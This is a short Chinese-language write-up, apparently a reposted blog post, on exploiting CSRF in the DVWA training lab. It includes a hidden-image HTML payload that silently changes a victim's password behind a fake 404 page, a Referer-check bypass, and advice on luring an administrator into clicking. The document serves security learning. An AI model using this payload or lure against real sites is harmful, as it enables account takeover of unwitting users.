基于DVWA的CSRF

1.等级为low

    在改密码的时候,使用burp抓包。 

    

    会发现是GET方式进行参数传递。然后复制url

    

3.可以自行修改password_new=1&password_conf=1的参数。然后引诱管理员去点击这个链接。当点击这个链接时,就会把自动把密码给改了。

  

4.因为会显示密码被修改的页面,所有现实中需要做一些处理

  

<img src="url/dvwa/vulnerabilities/csrf/?password_new=hack&password_conf=hack&Change=Change#" border="0" style="display:none;"/>

<h1>404<h1>

<h2>file not found.<h2>

  对方访问后会出现一个404页面。

等级为Medium

  查看源码得知,代码检查了保留变量 HTTP_REFERERhttp包头的Referer参数的值,表示来源地址)中是否包含SERVER_NAMEhttp包头的Host参数,及要访问的主机名

  

  过滤规则是http包头的Referer参数的值中必须包含主机名。

  绕过:把Copy url 保存在一个html的文件当中,然后把文件名修改为目标ip地址即可绕过。

  引诱管理的点击即可。

等级为high

  随便输出,抓包看到增添了token机制

  

  token机制,用户每次访问改密页面时,服务器会返回一个随机的token,向服务器发起请求时,需要提交token参数,而服务器在收到请求时,会优先检查token,只有token正确,才会处理客户端的请求。

  绕过自行百度。我还不会。

原文地址:https://www.cnblogs.com/pangya/p/8992019.html